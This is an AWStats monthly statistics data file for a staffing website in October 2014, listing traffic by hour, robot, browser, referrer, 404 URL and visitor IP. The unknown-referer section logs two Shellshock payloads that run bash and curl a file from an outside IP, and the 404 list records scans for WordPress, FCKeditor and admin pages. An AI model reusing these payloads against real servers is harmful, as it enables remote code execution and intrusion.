AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201410 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2523                
POS_VISITOR 17509               
POS_DAY 44777               
POS_DOMAIN 3423                
POS_LOGIN 3656                
POS_ROBOT 3811                
POS_WORMS 4874                
POS_EMAILSENDER 5005                
POS_EMAILRECEIVER 5148                
POS_SESSION 45641               
POS_SIDER 45851               
POS_FILETYPES 5283                
POS_OS 5466                
POS_BROWSER 5635                
POS_SCREENSIZE 6560                
POS_UNKNOWNREFERER 6634                
POS_UNKNOWNREFERERBROWSER 9149                
POS_ORIGIN 9888                
POS_SEREFERRALS 10036               
POS_PAGEREFS 10228               
POS_SEARCHWORDS 13865               
POS_KEYWORDS 14143               
POS_MISC 2186                
POS_ERRORS 14355               
POS_CLUSTER 3512                
POS_SIDER_404 14467               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101000402 4 274 39881857187
FirstTime 0
LastTime 20141031234847
LastUpdate 20141101020532 4 0 0 2 1
TotalVisits 794                 
TotalUnique 651                 
MonthHostsKnown 0                   
MonthHostsUnknown 727                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 24 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 46 62 244376 167 176 503664
1 52 115 784795 297 315 1169158
2 63 183 986313 149 156 348831
3 40 144 631539 162 171 721202
4 30 75 347298 194 206 626601
5 72 221 1107689 180 189 547448
6 51 195 1043642 181 193 511724
7 74 225 1310007 142 151 355424
8 79 211 1063612 155 163 461452
9 97 345 1972156 219 247 808726
10 58 229 1075572 248 267 853025
11 129 320 1653080 307 316 997950
12 120 269 1614321 199 219 675918
13 53 212 1133866 216 235 988025
14 84 207 1249944 292 303 972985
15 53 181 1075423 168 177 467075
16 108 328 1961895 161 186 906309
17 36 113 571172 163 178 637606
18 64 186 1183455 183 196 581017
19 73 140 683882 174 188 521959
20 57 171 860684 180 190 771127
21 77 152 763321 145 155 368192
22 43 107 499244 169 184 835477
23 65 153 667227 129 137 473587
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1624 4544 24484513
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 26
googlebot 1487 4690479 20141031232434 95
\wbot[\/\-] 1119 4453797 20141031233354 229
crawl 387 1842212 20141030135821 10
yandex 307 692086 20141031211711 117
mj12bot 287 471351 20141031205348 134
spider 251 514546 20141031195248 127
baiduspider 231 1266384 20141031161950 23
robot 164 553295 20141028142753 50
unknown 85 78461 20141031230529 85
java 78 435186 20141026160329 0
commons\-httpclient 8 9902 20141027004031 0
exabot 41 96072 20141028235835 17
ia_archiver 1 1288 20141010144459 0
msnbot 2 2576 20141027100603 0
slurp 50 272179 20141031232911 12
jcrawler 4 4474 20141007025325 2
custo 9 11763 20141020145236 0
surveybot 8 8872 20141021150742 4
archive\.org_bot 2 1860 20141030190717 2
psbot 9 27114 20141020150622 4
turnitinbot 6 4521 20141007084903 2
linkbot 1 1288 20141028024806 0
msnbot\-media 2 11259 20141011184120 1
netcraft 2 2614 20141008105442 0
nutch 62 200869 20141031052350 17
voila 8 8948 20141028223151 4
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 328 3163524 0 0
asp 1615 4797456 0 0
bmp 8 196848 0 0
js 358 1357051 0 0
jpg 1952 13371695 0 0
pdf 9 864204 0 0
gif 274 733735 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 11
linuxsuse 1
winxp 378
winlong 101
winnt 3019
linuxubuntu 29
linux 284
macosx 313
bsdfreebsd 3
bsdnetbsd 3
win2003 28
Unknown 385
END_OS

# Browser ID - Hits
BEGIN_BROWSER 65
msie6.0 27
firefox28.0 15
firefox3.8 1
firefox10.0 14
firefox26.0 25
firefox3.0.1 1
firefox18.0 3
firefox4.0 1
curl 3
lynx 2
firefox3.6.15 56
ecatch 4
msie8.0 216
msie7.0 128
firefox23.0 1
wget 4
firefox2.0.0.2 1
netscape 7
firefox3.0 3
firefox21.0 1
firefox29.0 221
firefox3.5.2 5
firefox12.0 3
firefox33.0 73
firefox25.0 3
mozilla 491
netscape5.0 3
firefox14.0.1 21
netscape4.0 4
firefox3.6.3 9
firefox1.0.3 7
firefox15.0.1 27
safari 2338
firefox5.0 8
firefox20.0 12
firefox3.6.11 1
firefox3.5.3 2
firefox24.0 1
firefox31.0 24
firefox6.0.2 16
firefox3.6.10 3
msie9.0 138
firefox1.5 1
Unknown 236
firefox27.0 1
firefox3.0.8 4
firefox32.0 159
firefox17.0 42
firefox3.5.1 4
libwww 3
opera 41
firefox30.0 2
msie5.5 1
firefox3.0.5 1
firefox3.0.3 2
firefox1.0.7 2
nokia 2
firefox1.0 1
firefox22.0 3
msie10.0 95
firefox3.6.12 3
msie 6
firefox3.5 5
firefox3.6.8 6
firefox3.6.13 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 38
SEOstats_2.1.0____________https://github.com/eyecatchup/SEOstats 20141017041539
Xenu_Link_Sleuth/1.3.8 20141028053557
WinInet_Test 20141009054607
libwww-perl/5.805 20141031110639
Owler 20141024163220
WWW-Mechanize/1.73 20141030215306
QACC_browser 20141031220551
A6-Indexer/1.0_(http://www.a6corp.com/a6-web-scraping-policy/) 20141031230529
Mozilla 20141029163021
Wotbox/2.01_(_http://www.wotbox.com/bot/) 20141027005416
Lynx/2.8.5rel.1_libwww-FM/2.15FC_SSL-MM/1.4.1c_OpenSSL/0.9.7e-dev 20141007173438
Mozilla/4.0 20141031071520
Mozilla/5.0_(BB10;_Touch)_AppleWebKit/537.35__(KHTML,_like_Gecko)_Version/10.2.1.3247_Mobile_Safari/537.35_ 20141027140901
Mozilla/5.0_(compatible;_Owler/0.4;__;_) 20141014054611
Opera/9.80_(Android;_Opera_Mini/7.0.29759/35.5125;_U;_en)_Presto/2.8.119_Version/11.10 20141028110807
Mozilla/5.0 20141027175830
Mozilla/5.0_(compatible;_pmoz.info_ODP_link_checker;__http://pmoz.info/doc/botinfo.htm) 20141026114232
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141022103610
wsr-agent/1.0 20141008052705
NerdyBot 20141031123410
Nokia6230i/2.0_(03.25)_Profile/MIDP-2.0_Configuration/CLDC-1.1 20141016094642
Mozilla/5.0_(compatible;_SiteExplorer/1.0b;__http://siteexplorer.info/) 20141031143656
Mozilla/5.0_(compatible;_DomainAppender_/1.0;__http://www.profound.net/domainappender) 20141017111703
LWP::Simple/6.00_libwww-perl/6.05 20141014014327
PHP/5.4.24 20141022072150
Opera/9.80_(Android;_Opera_Mini/7.5.35613/35.5003;_U;_en)_Presto/2.8.119_Version/11.10 20141019092345
Mozilla/5.0_(compatible;_MSIE_or_Firefox_mutant;_not_on_Windows_server;___http://tab.search.daum.net/aboutWebSearch.html)_Daumoa/3.0 20141028234705
()_{_:;};_/bin/bash_-c_"curl_-O_http://37.1.207.83/log.php?get=aHR0cDovL25jc2pvYnMuY29tLw==" 20141021135939
()_{_:;};_/bin/bash_-c_"curl_-O_http://37.1.207.83/log.php?get=aHR0cDovL3RoZW5jc2dyb3VwLmNvbS8=" 20141021204448
- 20141031201523
M 20141028105923
WhatWeb/0.4.8-dev 20141021151024
Twisted_PageGetter 20141013212034
Mozilla/5.0_(compatible;_wmtips.com/1.0;__http://www.wmtips.com/tools/) 20141027212624
Mozilla/4.0_(compatible;) 20141030231853
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141012051154
Mozilla/5.0_(compatible;_MSIE_10.0;_Windows_Phone_8.0;_Trident/6.0;_IEMobile/10.0;_ARM;_Touch;_NOKIA;_Lumia_520) 20141024155438
Mozilla/5.1_(compatible;_U5/1.0;__http://uni5download.com) 20141008063954
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 16
PHP/5.4.24 20141022072150
Xenu_Link_Sleuth/1.3.8 20141028053557
- 20141031201523
WinInet_Test 20141009054607
M 20141028105923
Owler 20141024163220
WhatWeb/0.4.8-dev 20141021151024
Twisted_PageGetter 20141013212034
A6-Indexer/1.0_(http://www.a6corp.com/a6-web-scraping-policy/) 20141031230529
QACC_browser 20141031220551
WWW-Mechanize/1.73 20141030215306
Wotbox/2.01_(_http://www.wotbox.com/bot/) 20141027005416
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141022103610
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141012051154
wsr-agent/1.0 20141008052705
NerdyBot 20141031123410
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 792 818
From1 2 2
From2 150 158
From3 400 1379
From4 280 2187
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
google 112 120
baidu 28 28
search 6 6
yahoo 4 4
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 84
http://semalt.semalt.com/crawler.php 67 67
http://ncsjobs.com 40 392
http://www.ncsjobs.com 34 183
http://www.yellowpages.com/about/legal/crawl 22 22
http://www.ncsjobs.com/consultants.asp 21 45
http://www.ncsjobs.com/company.asp 20 57
http://www.ncsjobs.com/home.asp 19 130
http://www.bing.com/search 12 12
http://www.ncsjobs.com/services.asp 11 25
http://www.ncsjobs.com/clients.asp 10 29
http://15847408.semalt.com/crawler.php 6 6
http://uni5download.com 4 4
http://walrobbins.com.au 2 2
http://www.wmtips.com/tools/info/ 1 1
http://www.ncsjobs.com/cs104a.asp 0 1
http://cn.bing.com/search 1 1
http://www.ncsjobs.com/caseStudies.asp 9 17
http://ncsjobs.com/consultants.asp 2 6
http://l.facebook.com/lsr.php 3 3
http://ncsjobs.com/caseStudies.asp 9 9
http://brickellbuickgmc.com 1 1
http://privhosting.com 2 2
http://www.ncsjobs.com/testimonials.asp 0 2
http://www.TETONVILLAGEHOTELS.iwax.com/The-Inn-at-Jackson-Hole-Teton-Village-Rates.htm 1 1
http://yandex.by/images/search 0 1
http://www.salsatecas.de/sitemap-atkacpi-driver-and-hotkey-related-utilities-y3ad2 2 2
http://printpeppermint.com 1 1
http://www.placebocity.com/biographies-placebo.html 1 1
http://www.nominet.org.uk/privacypolicy 4 4
http://www.thenclexreview.com 1 1
http://subscriber.zoominfo.com/zoominfo/ 1 2
http://mydressroom.co.uk 1 1
http://medicovi.com 1 1
http://www.ncsjobs.com/history.asp 2 12
http://www.lead411.com/company_TheNcsGroup_Hughes_55486.html 1 1
http://www.ncsjobs.com/staffing.asp 1 5
http://allleftturns.com 1 1
http://financialconsultant.asia 1 1
http://www.planculavrille.com/plan-q-avrille/baise-coquine-pres-de-avrille-pour-une-rencontre-chaude.html 1 1
http://domainsigma.com/whois/ncsjobs.com 4 4
http://www.ncsjobs.com/interviewPrep.asp 3 9
http://my.gamesgofree.com/results.php 1 1
http://wholesalekitchens.com.au 1 1
http://www.ncsjobs.com/aboutUs.asp 6 14
http://parsonagefinancial.co.uk 1 1
http://www.ncsjobs.com/careerResources.asp 6 15
http://www.ncsjobs.com/projectServices.asp 0 4
http://chaufferlalgerie.com 1 1
http://www.ourldsfamily.com/soft.php 2 2
http://37069656.semalt.com/crawler.php 2 2
http://buttons-for-website.com 1 1
http://bodywisesupplements.com 1 1
http://www.domaintuno.com/d/thencsgroup.com 4 4
http://nascomedia.com 1 1
http://www.ncsjobs.com/goldenRules.asp 0 1
http://cezartabac.ro 1 1
http://www.ncsjobs.com/cs101b.asp 0 1
http://speechtotextservice.com 1 1
http://musicas.baixar-musicas-gratis.com/baixar-musicas-gratis.php 1 1
http://ncsjobs.com/careerResources.asp 3 4
http://www.PORZH-PERSON.COM/decouvrir.php 1 1
http://tsport.com/index.php 1 1
http://www.ncsjobs.com/webStyles.css 0 111
http://ncsinnovation.com/forum/ 1 1
http://blotevrouwen.net 1 1
http://www.ncsjobs.com/registerApply.asp 3 13
http://www.ncsjobs.com/interviewQuestions.asp 1 1
http://ncsjobs.com/company.asp 8 19
http://www.ncsjobs.com/cs102d.asp 0 6
http://medispainstitute.com.au/laser-treatments/ 1 1
http://www.ncsjobs.com/docs/rjcm_a_157849.pdf 1 1
http://www.ncsjobs.com/jobSearch.asp 1 7
http://musica.descargar-musica-gratis.net/descargar-musica-gratis.php 1 1
http://ncsjobs.com/services.asp 4 11
http://www.webwiki.com/www.ncsjobs.com 1 1
http://aosheng-tech.com 1 1
http://ncsjobs.com/webStyles.css 0 14
http://ncsjobs.com/home.asp 2 24
http://www.ncsjobs.com/cs103a.asp 0 1
http://www.ncsjobs.com/contactUs.asp 9 27
http://ncsjobs.com/interviewQuestions.asp 2 2
http://differentinfashion.com 1 1
http://ncsjobs.com/clients.asp 2 2
http://www.ncsjobs.com/news.asp 2 8
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 3
www.ncs+jobs+.com 2
ncsjobs.com 1
meeting+business+goals+and+managing+bandwith+a+predictive+model+for+organizational+change 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 16
.com 2
www.ncs 2
jobs 2
ncsjobs.com 1
managing 1
a 1
model 1
organizational 1
bandwith 1
business 1
predictive 1
meeting 1
change 1
for 1
and 1
goals 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 3
302 14 5926
206 1 956
404 272 434204
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 83
/sitemap.xml 13 -
/cart/include/version.php 3 -
/buy/include/version.php 2 -
/contactus 1 -
/admin.php 7 -
/cgi-sys/defaultwebpage.cgi 2 -
/forum/ 2 http://forum.ncsjobs.com/
/wordpress/wp-login.php 1 -
/admin/editors/fckeditor/editor/filemanager/ 2 -
/styles/actions/users/form.css 2 -
/wp-admin/ 1 -
/changelog.txt 2 -
/index.php/admin/ 2 -
/cgi-sys/formmail-clone.cgi 1 -
/editors/fckeditor/editor/filemanager/ 2 -
/blog 1 http://ncsjobs.com/blog
/browserconfig.xml 2 -
/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/editor/editor/filemanager/connectors/test.html 1 -
/careerresources.asp/trackback/ 1 http://www.ncsjobs.com/careerResources.asp
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/+newlink1+ 6 -
/+newlink3+ 5 -
/admin/fckeditor/editor/filemanager/ 3 -
/blog/wp-admin/admin-ajax.php 1 -
/_1 1 -
/register.php 1 -
/js/fckeditor/editor/ 1 -
/fckeditor/editor/filemanager/ 3 -
/c:/inetpub/wwwroot/library/insurance/insurance102cs-projectmanagement.doc 1 -
/magento/customer/account/forgotpassword/ 2 -
/include/version.php 17 -
/admin/fckeditor/editor/filemanager/connectors/test.html 1 -
/+newlink2+ 7 -
/cgi-sys/entropysearch.cgi 1 -
/template/default/common/footer.htm 2 -
/include/fckeditor/editor/ 1 -
/administrator/ 6 -
/editor/editor/filemanager/browser/default/connectors/test.html 1 -
/blog/wp-login.php 1 -
/wp-login.php 14 -
/shop/customer/account/forgotpassword/ 2 -
/consultant.asp 42 -
/site/wp-login.php 1 -
/misc/drupal.js 2 -
/cgi-bin/hi 1 -
/catalog/password_forgotten.php 6 -
/apple-touch-icon.png 7 -
/wp-login/ 1 -
/postings/1775 1 -
/data/admin/ver.txt 2 http://ncsjobs.com
/engine/engine.php 2 -
/cgi-sys/suspendedpage.cgi 2 -
/customer/account/forgotpassword/ 2 -
/fckeditor/editor/filemanager/connectors/test.html 1 -
/wp-admin/admin-ajax.php 1 -
/store/customer/account/forgotpassword/ 2 -
/wp-admin 1 -
/store/include/version.php 3 -
/license.txt 2 -
/downloader/index.php 2 -
/js/mage/cookies.js 2 http://NCSJOBS.com
/order/include/version.php 2 -
/wp/wp-login.php 1 -
/section/wp-login.php 1 -
/apple-touch-icon-precomposed.png 8 -
/c:/inetpub/wwwroot/library/insurance/insurance108cs-systemconversion.doc 1 -
/xcart/include/version.php 3 -
/+document.referrer+ 4 -
/administrator/index.php 5 -
/oscommerce/password_forgotten.php 6 -
/fckeditor/editor/ 1 -
/manage/fckeditor/editor/ 1 -
/cgi-sys/realsignup.cgi 1 -
/misc/ui/jquery.effects.blind.min.js 2 -
/shop/password_forgotten.php 6 -
/postings/1771 2 -
/store/password_forgotten.php 6 -
/clients.asp/contactus.asp 1 http://ncsjobs.com/clients.asp
/index.php 5 http://ncsjobs.com/index.php
/market/include/version.php 2 -
/admin/fckeditor/editor/ 1 -
/shop/include/version.php 3 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 727
192.99.149.88 65 65 291548 20141028202441
81.144.138.34 60 60 286248 20141027005416
216.150.200.8 31 32 252441 20141022125423
54.191.207.84 27 56 403353 20141025161700
31.3.233.120 26 26 33488 20141031201523
54.68.115.147 25 54 413082 20141017165727
103.244.144.235 24 78 433429 20141031234847
117.196.128.53 24 47 286807 20141027014144
61.5.192.134 23 52 291532 20141027183848
208.64.57.208 21 21 66129 20141020145239
123.125.71.15 0 2 19588 
54.205.244.74 1 1 1288 20141013112437
86.14.68.60 7 22 138927 20141028123737
69.58.178.56 10 10 38321 20141004170754
192.199.247.12 1 1 5517 20141031072456
146.148.85.34 1 1 1312 20141014115348
217.69.133.169 2 2 2576 20141023061539
131.216.144.200 1 7 42768 20141001193003
220.255.1.81 0 1 9243 
54.190.104.225 1 1 1307 20141011094439
80.254.158.4 1 7 42768 20141010035807
74.91.40.132 1 1 5638 20141031072926
186.214.55.174 1 7 42768 20141020095939
106.77.178.32 17 40 262516 20141017123527
186.43.105.211 1 7 42768 20141021103344
67.202.118.20 1 1 3479 20141031052756
123.125.71.41 0 1 3844 
23.80.132.202 1 7 42768 20141029124958
209.82.41.111 1 1 1288 20141024225123
220.255.2.172 1 3 17452 20141028205819
54.204.113.106 1 1 1288 20141024212718
186.232.214.38 1 7 42768 20141019141535
220.255.1.126 0 1 2757 
130.211.115.162 1 1 1312 20141015115338
105.224.35.169 1 7 42768 20141008112834
198.211.105.73 6 8 34393 20141014042303
201.244.115.170 1 7 42768 20141012094317
123.125.68.45 1 1 4047 20141026031541
73.38.24.11 2 2 2509 20141016094642
123.125.71.106 0 1 3844 
167.160.95.134 2 2 4813 20141013094742
131.253.24.65 1 3 14926 20141019040614
123.125.71.20 0 1 3844 
54.88.85.122 1 1 1288 20141004203717
146.148.84.122 1 1 1312 20141013110444
99.12.164.206 2 12 56088 20141024163536
207.172.186.71 3 3 732 20141026114232
180.94.85.15 3 19 108692 20141003094319
24.171.172.74 2 8 43989 20141027101343
179.186.174.184 1 7 42768 20141003191059
198.211.96.53 12 16 68786 20141026023516
175.44.52.54 1 1 5131 20141013025857
14.100.132.6 1 10 43198 20141001235606
95.61.53.40 1 1 1288 20141009120243
123.125.71.82 0 1 9794 
109.54.208.155 1 7 42768 20141003131033
173.68.18.130 1 1 1307 20141027175830
38.100.21.62 9 10 40103 20141020052310
111.92.93.11 2 8 43989 20141001075731
54.172.15.99 1 1 1288 20141002111005
80.67.17.163 2 2 2614 20141016045633
91.200.13.64 1 1 1288 20141023105030
77.70.64.66 1 1 268 20141024065533
123.125.68.16 1 1 3479 20141026031543
198.58.101.190 1 1 1288 20141008052705
123.125.71.109 0 1 9794 
220.255.1.24 0 1 569 
182.118.44.38 1 3 14926 20141029065724
54.165.185.199 1 1 1288 20141002134827
122.3.127.22 1 7 42768 20141007040626
220.255.2.25 0 1 3844 
213.133.97.216 3 3 1833 20141022234108
62.24.181.134 1 1 1307 20141020084703
83.35.16.30 1 7 42768 20141011174354
157.55.39.4 0 1 3844 
118.96.91.177 1 7 42768 20141019212911
216.172.56.37 2 2 2576 20141006173539
208.93.104.7 2 2 488 20141009022225
130.211.114.110 1 1 1312 20141027112305
54.197.204.22 1 1 1307 20141023063434
24.255.242.225 1 7 42768 20141007204528
46.53.180.192 0 1 12403 
205.237.88.141 1 1 1312 20141007115524
123.125.68.35 1 1 4241 20141031010434
27.97.197.38 18 19 83590 20141018090448
216.52.165.1 1 7 42768 20141017104101
162.223.8.26 2 2 5386 20141002115658
103.28.133.36 0 1 2757 
130.211.127.63 1 1 1312 20141030123405
54.172.36.59 1 1 1288 20141026030353
123.125.71.91 1 1 4676 20141028142532
123.125.71.55 1 1 5150 20141028142529
119.31.123.207 0 1 3005 
82.207.137.1 1 1 1288 20141030215306
199.30.24.44 0 6 41480 
107.77.68.128 4 31 165500 20141010130800
46.4.17.22 4 4 976 20141017041539
23.251.153.19 1 1 1312 20141024112341
106.66.159.52 1 1 1288 20141019110055
2.90.120.179 1 5 7022 20141002223144
41.58.235.194 2 12 57191 20141027072725
105.236.200.108 5 23 155871 20141021092226
50.57.190.113 1 1 1312 20141003094204
220.255.2.154 0 2 10876 
54.167.217.3 1 1 1288 20141023163528
104.36.84.140 1 1 1307 20141013130719
54.187.150.15 7 18 105786 20141016150651
146.148.93.30 1 1 1312 20141010115306
84.48.121.84 1 1 1288 20141006085432
192.99.40.137 8 8 1952 20141028135013
99.105.70.64 6 25 172307 20141029132139
211.244.83.248 2 2 2576 20141028234705
199.30.80.99 1 1 1288 20141008190110
123.125.71.100 0 1 9794 
202.156.15.10 0 2 10876 
198.178.124.47 2 2 2576 20141031202305
91.121.92.177 1 1 1288 20141001085539
186.178.62.226 1 7 42768 20141004200338
54.160.20.207 1 1 1307 20141010230503
213.248.211.173 4 4 3102 20141029113025
54.84.237.253 1 1 1288 20141007001144
50.250.215.253 1 1 1288 20141020083410
24.1.136.31 1 10 43198 20141031080533
103.1.69.216 1 7 42768 20141028105528
50.154.206.92 1 7 42768 20141015210200
201.246.104.238 1 7 42768 20141008211107
54.90.31.191 9 9 34024 20141020155435
198.50.28.189 1 1 1288 20141009094848
130.211.113.171 1 1 1312 20141014110523
220.255.1.39 1 1 4165 20141027130935
206.82.20.62 4 18 102050 20141007123428
81.167.212.82 1 10 41798 20141013093923
187.23.181.108 1 7 42768 20141018235537
79.42.19.13 1 7 42768 20141008094917
192.241.157.23 1 3 14926 20141027184455
123.125.68.15 1 1 108005 20141031010436
221.134.114.108 1 7 42768 20141011025036
78.135.79.153 2 2 2576 20141030072448
89.234.68.89 6 6 20755 20141023080155
188.79.226.171 1 7 42768 20141025154651
27.150.230.47 14 14 26022 20141030235739
179.159.147.164 1 7 42768 20141022145228
146.148.94.0 1 1 1312 20141012115234
78.158.11.226 2 2 4786 20141007173438
68.82.209.41 1 1 1288 20141006022222
123.125.71.110 1 1 5666 20141028142529
23.251.153.113 1 1 1312 20141004115551
208.43.251.182 1 1 1288 20141027095004
85.115.54.180 3 19 112367 20141010064513
74.91.34.28 1 1 1354 20141031072451
199.227.48.210 1 1 1288 20141014205927
1.202.187.49 0 6 41594 
173.165.206.78 5 21 133203 20141014164624
177.43.76.150 1 7 42768 20141010120825
175.156.170.7 1 10 43198 20141031055716
185.26.180.32 4 18 99633 20141028110406
189.15.195.26 1 7 42768 20141014181433
54.191.126.48 4 15 78224 20141021222232
23.236.52.98 1 1 1312 20141009110804
178.125.201.67 2 2 2614 20141006010119
193.201.224.103 3 3 3921 20141031165307
131.253.24.81 1 3 17666 20141018225257
177.138.183.32 1 7 42768 20141003203538
146.148.50.118 1 1 1312 20141022112231
96.22.11.7 1 1 1307 20141008235734
123.125.71.108 0 1 9794 
177.17.106.231 1 7 42768 20141001224719
164.68.56.98 1 7 42768 20141016110514
92.124.39.191 1 1 1288 20141008161751
207.46.13.49 0 1 3844 
54.200.39.178 1 1 1307 20141013100748
190.26.28.106 1 7 42768 20141016134337
208.80.194.33 1 1 1307 20141011142718
106.78.57.67 3 18 99312 20141010094517
123.125.68.42 1 1 3611 20141026031606
92.84.146.166 1 6 42200 20141011091555
220.255.1.70 0 2 5502 
68.71.44.11 2 2 2614 20141021023846
36.73.88.28 1 7 42768 20141009221847
206.130.125.28 1 1 1307 20141007195815
195.99.250.130 3 16 87370 20141006092845
201.55.31.82 1 7 42768 20141022072615
146.148.58.151 1 1 1312 20141018123400
197.254.107.186 2 17 95351 20141014060721
159.224.139.133 2 2 2614 20141013215657
54.160.13.96 1 1 1288 20141020201304
61.135.190.103 3 6 15396 20141021190635
173.252.74.113 1 1 1288 20141022103610
54.172.51.114 1 1 1288 20141006204258
186.83.9.241 1 7 42768 20141013203554
69.30.241.18 1 1 1288 20141005231252
220.255.1.63 0 1 762 
188.40.54.199 1 1 1307 20141019195856
220.255.2.179 0 1 9794 
186.236.111.107 1 7 42768 20141015085234
220.255.1.87 1 1 6829 20141017225503
54.172.79.148 2 3 16846 20141004182525
67.108.126.178 6 21 123288 20141028160630
69.58.178.58 10 10 38321 20141012051202
186.210.25.124 1 7 42768 20141018070832
209.179.43.141 3 20 159546 20141008181822
62.75.223.231 1 1 1288 20141010074311
123.125.71.58 0 1 3844 
123.125.71.43 1 2 13405 20141028142529
146.148.94.142 1 1 1312 20141016110605
123.125.71.51 0 1 9794 
182.74.116.54 2 2 2576 20141014054611
103.28.133.15 2 6 48210 20141026230303
54.173.44.76 1 1 1288 20141025233010
184.14.89.34 3 16 98338 20141009124511
199.223.236.235 1 1 1312 20141005115443
208.93.104.9 18 18 7524 20141030205625
54.69.215.152 2 12 73712 20141019164737
130.211.177.50 1 1 1312 20141012110511
69.164.197.197 1 1 1288 20141001223753
64.120.51.71 1 1 8651 20141031072923
177.158.110.154 1 7 42768 20141024071755
106.66.157.144 2 2 5443 20141018052635
220.181.51.103 1 1 1307 20141005194658
58.6.170.231 1 7 42768 20141005134041
107.167.107.101 2 11 53499 20141019092345
82.118.119.213 3 19 110031 20141001050441
180.153.206.37 1 2 5170 20141005064040
162.216.103.76 1 1 3782 20141031072452
151.66.90.252 1 7 42768 20141014174605
116.87.8.110 1 10 43198 20141025232716
54.226.26.97 1 1 1288 20141016223313
106.208.95.60 0 1 2780 
220.181.108.186 1 1 5253 20141028142528
202.70.67.56 1 7 42768 20141020045836
73.44.107.117 3 16 85614 20141006202743
5.248.87.10 1 1 1288 20141025085250
5.102.80.186 5 19 106591 20141020085058
192.227.188.241 1 1 1288 20141013100753
146.148.64.132 1 1 1312 20141002110003
146.148.62.240 1 1 1312 20141025123446
54.84.67.177 1 1 4165 20141004021311
119.56.123.89 1 10 39416 20141011062101
74.114.36.65 15 35 215933 20141030115403
54.173.132.171 1 1 1288 20141031230529
49.230.130.240 2 16 92346 20141030012708
185.27.250.18 2 14 70934 20141026040411
146.148.84.116 1 1 1312 20141004111008
176.92.114.5 1 7 42768 20141003113503
84.240.9.6 1 1 1307 20141022053120
188.92.76.167 4 4 976 20141007004137
186.22.70.106 1 7 42768 20141016020405
108.59.86.178 1 1 1312 20141007110639
179.56.123.124 1 7 42768 20141003234844
188.180.121.209 4 18 113696 20141025134929
124.124.219.33 0 1 2780 
12.221.65.254 1 7 42768 20141027154723
201.20.186.222 1 7 42768 20141023002316
68.194.96.83 1 7 42768 20141009114145
146.148.67.42 1 1 1312 20141003110538
66.249.90.73 0 1 29124 
117.222.144.128 7 12 131643 20141025024620
54.237.238.163 1 1 1288 20141029080840
46.109.150.128 2 17 95351 20141016092857
201.46.179.22 1 7 42768 20141021054207
5.9.104.170 1 1 1307 20141024112112
54.160.184.110 1 1 1288 20141004025047
87.202.78.224 1 7 42768 20141009124721
61.135.190.102 2 4 10264 20141019090205
38.100.21.78 10 11 45893 20141012061318
69.162.131.77 1 1 7044 20141031072924
54.86.156.36 0 1 3844 
146.148.64.64 1 1 1312 20141026112444
82.145.221.204 1 7 42701 20141028110806
